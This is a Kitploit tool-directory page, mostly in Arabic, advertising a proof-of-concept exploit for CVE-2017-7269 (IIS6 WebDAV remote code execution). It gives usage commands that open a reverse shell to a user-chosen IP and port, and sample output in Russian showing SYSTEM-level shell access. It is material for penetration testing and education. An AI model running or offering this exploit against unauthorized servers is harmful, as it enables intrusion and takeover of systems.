Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7269 — هي أداة إثبات مفهوم (PoC) توضح استغلال ثغرة أمنية معروفة في مكون WebDAV الخاص بـ IIS6 | Kitploit
أدوات/GitHubGitHub/geniuszly/cve-2017-7269
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

هي أداة إثبات مفهوم (PoC) توضح استغلال ثغرة أمنية معروفة في مكون WebDAV الخاص بـ IIS6

عرض المستودع
42منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EN

GenWebDavIISExploit هي أداة إثبات مفهوم (PoC) توضح استغلال ثغرة أمنية معروفة في مكون WebDAV الخاص بـ IIS6. صُممت هذه الأداة للأغراض التعليمية والبحثية لعرض كيفية استغلال الثغرة لتنفيذ تعليمات برمجية عشوائية على خادم بعيد.

إخلاء مسؤولية

هذا المشروع مخصص للأغراض التعليمية فقط. استخدم هذه الأداة بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

الميزات

  • تنفيذ تعليمات برمجية عن بُعد على خوادم IIS6 WebDAV الضعيفة.
  • إنشاء حمولة ديناميكية مع عنوان IP ومنفذ عكسي يحددهما المستخدم.
  • واجهة سطر أوامر سهلة الاستخدام للاستغلال السريع.

المتطلبات الأساسية

  • Python 3.x: تأكد من تثبيت Python 3 على نظامك.
  • الوصول إلى الشبكة: القدرة على الاتصال بعنوان IP ومنفذ الجهاز المستهدف.

الاستخدام

وسائط سطر الأوامر

  • Target IP: عنوان IP لخادم IIS6 WebDAV المستهدف.
  • Target Port: رقم المنفذ الذي تعمل عليه خدمة WebDAV (عادةً 80).
  • Reverse IP: عنوان IP الخاص بك حيث يجب أن يتصل الصدفة العكسية.
  • Reverse Port: رقم المنفذ على نظامك لاستقبال الصدفة العكسية.

مثال

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

مثال استخدام

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

مثال على الإخراج

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

ملاحظات

  • تأكد من تشغيل مستمع على المنفذ العكسي المحدد لالتقاط الصدفة العكسية الواردة.
  • استخدم هذه الأداة فقط على الأنظمة المصرح بها لاختبار الثغرات الأمنية.
تنزيل الأداة